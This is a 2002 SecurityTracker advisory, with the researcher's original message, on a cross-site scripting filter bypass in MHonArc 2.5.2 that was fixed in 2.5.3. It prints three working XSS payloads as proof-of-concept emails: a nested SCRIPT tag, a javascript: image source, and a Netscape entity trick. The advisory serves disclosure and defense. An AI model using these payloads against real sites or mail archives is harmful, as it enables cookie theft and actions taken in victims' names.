SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   MHonArc Vendors:   Hood, Earl
MHonArc Mail-to-HTML Converter Input Filtering Mechanisms Can Be Bypassed, Allowing Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1004107
SecurityTracker URL:  http://securitytracker.com/id/1004107
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Apr 19 2002
Impact:   Disclosure of authentication information, Execution of arbitrary code via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 2.5.2
Description:   An input validation vulnerability was reported in MHonArc, a Perl-based mail-to-HTML converter. A remote user can bypass input filtering mechanisms and conduct cross-site scripting attacks against MHonArc users.

It is reported that MHonArc filters out scripting tags from user supplied mail messages. However, a remote user can apparently create e-mail content that will bypass the filtering mechanism.

For example, the following type of text will be partially filtered, yielding valid scripting code in the resulting HTML:

<SCR<SCRIPT></SCRIPT>IPT>alert(document.domain)</SCR<SCRIPT></SCRIPT>IPT>

Javascript can also be placed within an image tag, as shown:

<IMG SRC=javascript:alert(document.domain)>

Finally, the following code will allow javascript to bypass the filter, but is only effective if Netscape 4.x is used by the target (victim) user.

<B foo=&{alert(document.domain)};>
</B>

In all of these cases, a remote user could submit an e-mail message that, when converted by MHonArc and viewed by a target (victim) user, will cause arbitrary Javascript to be executed by the target user's browser. The code will originate from the MHonArc site and will run in the security context of that site. As a result, the code can access the target user's cookies associated with that site (if any) and can take actions on behalf of the target user.

Impact:   A remote user can cause arbitrary javascript to be executed on a target (victim) user's browser. The code can access the user's cookies associated with the MHonArc site (if any) and can take actions on the MHonArc site on behalf of the user.
Solution:   The vendor has released a fixed version (2.5.3(, as described at:

http://www.mhonarc.org/MHonArc/CHANGES

The new version is available at:

http://www.mhonarc.org/#availability

Vendor URL:  www.mhonarc.org/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Underlying OS Comments:  Perl-based

Message History:   None.


 Source Message Contents

Subject:  MHonArc v2.5.2 Script Filtering Bypass Vulnerability


MHonArc v2.5.2 Script Filtering Bypass Vulnerability
====================================================

Affected:
---------
  MHonArc v2.5.2
  http://www.mhonarc.org/

Fixed:
------
  MHonArc v2.5.3
  http://www.mhonarc.org/MHonArc/CHANGES

Problem:
--------
  MHonArc has a feature which filters out scripting tags from incoming
  HTML mails and it is enabled on default.  However, some variations
  of scripting tags will not be filtered.

Exploit 1:
----------
  From: test@example.com
  To: test@example.com
  Date: Sun, 16 Dec 2001 00:00:00 +0900
  Subject: test
  MIME-Version: 1.0
  Content-Type: text/html
  
  <HTML>
  <SCR<SCRIPT></SCRIPT>IPT>alert(document.domain)</SCR<SCRIPT></SCRIPT>IPT>
  </HTML>
----------

Exploit 2:
----------
  From: test@example.com
  To: test@example.com
  Date: Sun, 16 Dec 2001 00:00:00 +0900
  Subject: test
  MIME-Version: 1.0
  Content-Type: text/html
  
  <HTML>
  <IMG SRC=javascript:alert(document.domain)>
  </HTML>
----------

Exploit 3:
----------
  From: test@example.com
  To: test@example.com
  Date: Sun, 16 Dec 2001 00:00:00 +0900
  Subject: test
  MIME-Version: 1.0
  Content-Type: text/html
  
  <HTML>
  <B foo=&{alert(document.domain)};>
  Vulnerable only if Netscape 4.x is used to browse.</B>
  </HTML>
----------

Vendor Status:
--------------
  The author was contacted on December 16, 2001.
  The fixed version was released on April 18, 2002.


Best regards,
--
Hiromitsu Takagi, Ph.D.
National Institute of Advanced Industrial Science and Technology,
Tsukuba Central 2, 1-1-1, Umezono, Tsukuba, Ibaraki 305-8568, Japan
http://staff.aist.go.jp/takagi.hiromitsu/


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC